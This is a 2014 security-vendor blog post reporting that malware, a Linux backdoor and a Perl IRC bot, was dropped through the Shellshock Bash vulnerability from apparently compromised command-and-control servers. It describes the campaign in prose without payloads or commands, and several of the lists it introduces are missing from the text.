Malware in the Wild Abusing "Shellshock" Vulnerability
Posted by Carl Leonard on 01 October 2014 07:38 AM
Since the Shellshock vulnerability became public knowledge, our ThreatSeeker® Intelligence Cloud has seen evidence of this vulnerability being exploited in the wild to drop malware.
We shall illustrate one such example below:
Backdoors and Bot Nets
The observed malware found to be exploiting the Shellshock vulnerability has been dropped by various command and control (C&C) servers previously known to Websense Security Labs™. The malware has the following capabilities:
The malware has been seen to be downloaded to a compromised machine by exploiting the Shellshock vulnerability and invoking commands such as "curl" or "wget," and then executing the malicious payload. To date, we have seen 4 variants of the Linux backdoor and several versions of the Perl-based IRC bot.
Popularity Since Vulnerability Disclosure
The following domains and IPs have been found to be used as command & control (C&C) points for this campaign (amongst others):
Figure 1: chart showing increase in prevalence of C&C associated with the above malware, peaking around September 25, 2014.
We have seen C&C traffic to these IPs in the last 2 months, showing that they have been used for malicious and bot network campaigns prior to the Shellshock vulnerability disclosure. In fact, going back as far as 2012, we see that one such C&C was used in a Point-of-Sale malware campaign known as "vSkimmer." More recently, we have observed it serving up an IRC bot.
The spike that we saw on September 25, 2014, ties in with the usage of these servers as command & control points for malware dropped in the exploitation of the Shellshock vulnerability. We have deduced that these are likely compromised servers, since we do see the infrastructure hosting legitimate websites. Cyber-criminals typically prefer compromised servers in order to piggyback on the reputation of those known hosts and to enhance their ability to remain anonymous.
Websense customers are protected from the malware described above by ACE, our Advanced Classification Engine, at the following stages:
Additional Abuse of Shellshock Expected
Since the intial disclosure of CVE-2014-6271, we seen another 5 vulnerabilities identified in Bash. These have been assigned identifiers:
Experience has taught us that as cyber-criminals zoom in on the vulnerable code branch, additional vulnerabilities are likely to surface. We strongly recommend that you monitor such issues and apply mitigation accordingly.
We have updated our ThreatSeeker Intelligence Cloud to seek out likely candidates across the kill chain.
Read more »